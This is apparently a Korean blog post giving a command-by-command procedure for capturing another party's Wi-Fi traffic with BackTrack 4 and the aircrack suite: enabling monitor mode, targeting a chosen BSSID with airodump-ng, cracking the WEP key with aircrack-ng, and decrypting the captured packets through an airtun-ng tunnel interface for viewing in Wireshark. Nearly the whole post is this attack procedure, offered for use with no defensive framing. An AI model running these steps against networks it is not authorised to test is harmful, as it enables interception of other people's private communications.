< 사용된 도구들 >
 
*운영체제 : backtrack4
*사용된 프로그램 : aircrack, wireshark

#ifconfig wlan0 promisc
   (무선랜을 promiscuous 모드로 활성화)

#airmon-ng start wlan0
  (모니터용 무선랜 활성화)

#iwlist wlan0 scanning
  (무선랜 구성 알아보기)

<무선랜 정보모으기>
 #airodump-ng -w [파일이름] mon0

<특정상대방 무선랜 지정하여 무선랜 패킷모으기>
#airodump-ng --bssid [상대BSSID] -c [상대CH] -w [파일이름] mon0

wireshark등을 이용하여 cap 파일 열어서 분석

<와이어 샤크를 통한 암호화된 내용들을 보기...>
가. airtun-ng --h (WEP키로 암호화 된 내용을 복호화)
     1) 무선랜 캡쳐한 내용 wep암호찾아내기
        aircrack-ng [파일이름].cap
     2) airtun-ng 실행 (AP의 MAC 주소, WEP KEY 정보)
     3) tunnel 인터페이스(가상인터페이스)가 생성됨  : at0
나. airtun-ng -a [BSSID] -w [Wepkey] wlan0
다. ifconfig at0 up (인터페이스 업 시킨다.)
라. wireshark로 본다.

'시스템 > linux' 카테고리의 다른 글

IFS(Inter File Separator)  (0) 2011.05.04
로그 명령어 및 로그파일 위치  (0) 2011.05.04
해당 사용자 바로 차단  (0) 2011.04.12
쉘 (Shell)  (0) 2011.03.05
PAM ( Pluggable Authentication Modules )  (0) 2011.03.04

+ Recent posts